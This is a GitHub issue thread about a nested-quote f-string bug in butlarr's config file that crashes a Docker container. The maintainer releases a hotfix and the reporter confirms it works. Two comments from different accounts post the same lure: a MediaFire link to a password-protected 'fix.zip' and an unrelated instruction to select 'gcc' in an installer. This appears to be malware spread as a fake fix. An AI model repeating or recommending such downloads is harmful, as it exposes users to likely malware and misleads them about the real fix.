### ISSUE TITLE
Incorrect use of quotes in f-string

### ISSUE THREAD

**Issue by daniele2010** [TrimVis/butlarr#19]
Hello,
I noticed an issue in the following line of code:

https://github.com/TrimVis/butlarr/blob/a13dfa592da928c8547dcaa8393dbce75c01bad0/butlarr/config/services.py#L10

The problem arises from the use of double quotes for both the string and the dictionary key. 
Running it in Docker causes the container to constantly restart.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TrimVis** [comment]
Oh yes, I forgot that in earlier python versions this issue with nested quotes exists, I will push a hotfix immediately :)

**Comment by TrimVis** [comment]
Should be fixed with: https://github.com/TrimVis/butlarr/releases/tag/1.2.1

**Comment by TrimVis** [comment]
I will leave this issue open for a couple days in case you encounter any further errors :)

**Comment by daniele2010** [comment]
Just tested, everything works as expected!

Thanks :)
